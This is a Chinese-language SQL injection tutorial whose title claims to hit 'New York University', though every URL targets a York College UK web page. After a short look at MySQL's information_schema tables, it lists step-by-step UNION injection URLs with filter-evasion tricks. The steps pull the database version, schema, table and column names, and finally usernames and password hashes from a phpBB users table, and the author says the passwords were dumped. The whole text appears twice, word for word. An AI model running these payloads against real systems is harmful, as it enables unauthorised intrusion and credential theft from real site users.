手工注入纽约大学
一 原理分析
我看看mysql5比之前增加的系统数据库information_schema的结构,它是用来存储数据库系统信息的
mysql> use information_schema;
Database changed
mysql> show tables;
+—————————————+
| Tables_in_information_schema |
+—————————————+
| CHARACTER_SETS |
| COLLATIONS |
| COLLATION_CHARACTER_SET_APPLICABILITY |
| COLUMNS |
| COLUMN_PRIVILEGES |
| KEY_COLUMN_USAGE |
| ROUTINES |
| SCHEMATA |
| SCHEMA_PRIVILEGES |
| STATISTICS |
| TABLES |
| TABLE_CONSTRAINTS |
| TABLE_PRIVILEGES |
| TRIGGERS |
| USER_PRIVILEGES |
| VIEWS |
+—————————————+
这里只挑注射中可以用到的几个表。
| SCHEMATA ――>存储数据库名的,
|——>关键字段:SCHEMA_NAME,表示数据库名称
| TABLES ――>存储表名的
|——>关键字段:TABLE_SCHEMA表示表所属的数据库名称;
TABLE_NAME表示表的名称
| COLUMNS ――>存储字段名的
|——>关键字段:TABLE_SCHEMA表示表所属的数据库名称;
TABLE_NAME表示所属的表的名称
COLUMN_NAME表示字段名
二 注入过程
1 版本号:1:版本号http://lrc.yorkcollege.ac.uk/subjects /display.php?id=64%20union%20select%201,2,3,4,unhex(hex(@@version)),6,7,8,9,10,11 /*(这里用hex unhex绕过错误)
2用户名:2:用户名http://lrc.yorkcollege.ac.uk/subjects/display.php?id=64%20union%20select%201,2,3,4,unhex(hex(user())),6,7,8,9,10,11/*
3数据库名:11:数据库库名:http://lrc.yorkcollege.ac.uk/subjects /display.php?id=64%20union%20select%201,2,3,4,unhex(hex(SCHEMA_NAME)),6,7,8,9,10,11%20from%20information_schema.SCHEMATA%20where%20SCHEMA_NAME%20like%20char(37,105,108,116,95,112,104,112,98,98,37)/* 这里我们找下phpbb的表段。(关键模糊查询,有些库名是很多的。甚至上百,模糊查询可以帮你找到你所希望的。例如:%pass% %phpbb%等 有用的表)
4段名:4:段名http://lrc.yorkcollege.ac.uk/subjects /display.php?id=64%20union%20all%20select%201,2,3,4,unhex(hex(table_name)),6,7,8,9,10,11%20from%20information_schema.tables%20where%20table_schema=database() /*(这里直接利用查询=database查询与用户有关的段)
5:避免限制limit的:http://lrc.yorkcollege.ac.uk/subjects /display.php?id=64%20union%20all%20select%201,2,3,4,unhex(hex(table_name)),6,7,8,9,10,11%20from%20information_schema.tables%20where%20table_schema=database()%20and%20table_name%20!=%20char(117,115,101,114,115%20) /*(有些情况下limit是被限制的 之类我们可以采用!=来绕过)
6:username:http://lrc.yorkcollege.ac.uk/subjects /display.php?id=64%20union%20all%20select%201,2,3,4,unhex(hex(column_name)),6,7,8,9,10,11%20from%20information_schema.columns%20where%20table_name=char(117,115,101,114,115)%20limit%202,1/*
7:password:http://lrc.yorkcollege.ac.uk/subjects /display.php?id=64%20union%20all%20select%201,2,3,4,unhex(hex(column_name)),6,7,8,9,10,11%20from%20information_schema.columns%20where%20table_name=char(117,115,101,114,115)%20limit%206,1 /*(由于长度问题 这里显示不出来 经试验此表并不重要)
8 容错的:http://lrc.yorkcollege.ac.uk/subjects /display.php?id=-1%20union%09select%091,2,3,4,username,6,7,8,9,10,11%09from%09users /*(大家注意这条语句 很多情况下如果我们id=64 是不行的 这里64可换为-1 两外%20换为%09 多多注意哦 )
9模糊查询:http://lrc.yorkcollege.ac.uk/subjects /display.php?id=64%20union%20all%20select%201,2,3,4,unhex(hex(table_name)),6,7,8,9,10,11%20from%20information_schema.tables%20where%20table_name%20like%20char(37,112,104,112,37)/*
10:结果:http://lrc.yorkcollege.ac.uk/subjects /display.php?id=64+union+select+1,2,3,4,unhex(hex(concat(username,0×3a,user_password))),6,7,8,9,10,11+from+ilt_phpbb.phpbb_users
时间关系 不再补充 关键字段已经爆出 。
用户密码也已经爆出。
关键在于大家对于MY SQL注入错误的一些对待问题。
我看看mysql5比之前增加的系统数据库information_schema的结构,它是用来存储数据库系统信息的
mysql> use information_schema;
Database changed
mysql> show tables;
+—————————————+
| Tables_in_information_schema |
+—————————————+
| CHARACTER_SETS |
| COLLATIONS |
| COLLATION_CHARACTER_SET_APPLICABILITY |
| COLUMNS |
| COLUMN_PRIVILEGES |
| KEY_COLUMN_USAGE |
| ROUTINES |
| SCHEMATA |
| SCHEMA_PRIVILEGES |
| STATISTICS |
| TABLES |
| TABLE_CONSTRAINTS |
| TABLE_PRIVILEGES |
| TRIGGERS |
| USER_PRIVILEGES |
| VIEWS |
+—————————————+
这里只挑注射中可以用到的几个表。
| SCHEMATA ――>存储数据库名的,
|——>关键字段:SCHEMA_NAME,表示数据库名称
| TABLES ――>存储表名的
|——>关键字段:TABLE_SCHEMA表示表所属的数据库名称;
TABLE_NAME表示表的名称
| COLUMNS ――>存储字段名的
|——>关键字段:TABLE_SCHEMA表示表所属的数据库名称;
TABLE_NAME表示所属的表的名称
COLUMN_NAME表示字段名
二 注入过程
1 版本号:1:版本号http://lrc.yorkcollege.ac.uk/subjects /display.php?id=64%20union%20select%201,2,3,4,unhex(hex(@@version)),6,7,8,9,10,11 /*(这里用hex unhex绕过错误)
2用户名:2:用户名http://lrc.yorkcollege.ac.uk/subjects/display.php?id=64%20union%20select%201,2,3,4,unhex(hex(user())),6,7,8,9,10,11/*
3数据库名:11:数据库库名:http://lrc.yorkcollege.ac.uk/subjects /display.php?id=64%20union%20select%201,2,3,4,unhex(hex(SCHEMA_NAME)),6,7,8,9,10,11%20from%20information_schema.SCHEMATA%20where%20SCHEMA_NAME%20like%20char(37,105,108,116,95,112,104,112,98,98,37)/* 这里我们找下phpbb的表段。(关键模糊查询,有些库名是很多的。甚至上百,模糊查询可以帮你找到你所希望的。例如:%pass% %phpbb%等 有用的表)
4段名:4:段名http://lrc.yorkcollege.ac.uk/subjects /display.php?id=64%20union%20all%20select%201,2,3,4,unhex(hex(table_name)),6,7,8,9,10,11%20from%20information_schema.tables%20where%20table_schema=database() /*(这里直接利用查询=database查询与用户有关的段)
5:避免限制limit的:http://lrc.yorkcollege.ac.uk/subjects /display.php?id=64%20union%20all%20select%201,2,3,4,unhex(hex(table_name)),6,7,8,9,10,11%20from%20information_schema.tables%20where%20table_schema=database()%20and%20table_name%20!=%20char(117,115,101,114,115%20) /*(有些情况下limit是被限制的 之类我们可以采用!=来绕过)
6:username:http://lrc.yorkcollege.ac.uk/subjects /display.php?id=64%20union%20all%20select%201,2,3,4,unhex(hex(column_name)),6,7,8,9,10,11%20from%20information_schema.columns%20where%20table_name=char(117,115,101,114,115)%20limit%202,1/*
7:password:http://lrc.yorkcollege.ac.uk/subjects /display.php?id=64%20union%20all%20select%201,2,3,4,unhex(hex(column_name)),6,7,8,9,10,11%20from%20information_schema.columns%20where%20table_name=char(117,115,101,114,115)%20limit%206,1 /*(由于长度问题 这里显示不出来 经试验此表并不重要)
8 容错的:http://lrc.yorkcollege.ac.uk/subjects /display.php?id=-1%20union%09select%091,2,3,4,username,6,7,8,9,10,11%09from%09users /*(大家注意这条语句 很多情况下如果我们id=64 是不行的 这里64可换为-1 两外%20换为%09 多多注意哦 )
9模糊查询:http://lrc.yorkcollege.ac.uk/subjects /display.php?id=64%20union%20all%20select%201,2,3,4,unhex(hex(table_name)),6,7,8,9,10,11%20from%20information_schema.tables%20where%20table_name%20like%20char(37,112,104,112,37)/*
10:结果:http://lrc.yorkcollege.ac.uk/subjects /display.php?id=64+union+select+1,2,3,4,unhex(hex(concat(username,0×3a,user_password))),6,7,8,9,10,11+from+ilt_phpbb.phpbb_users
时间关系 不再补充 关键字段已经爆出 。
用户密码也已经爆出。
关键在于大家对于MY SQL注入错误的一些对待问题。
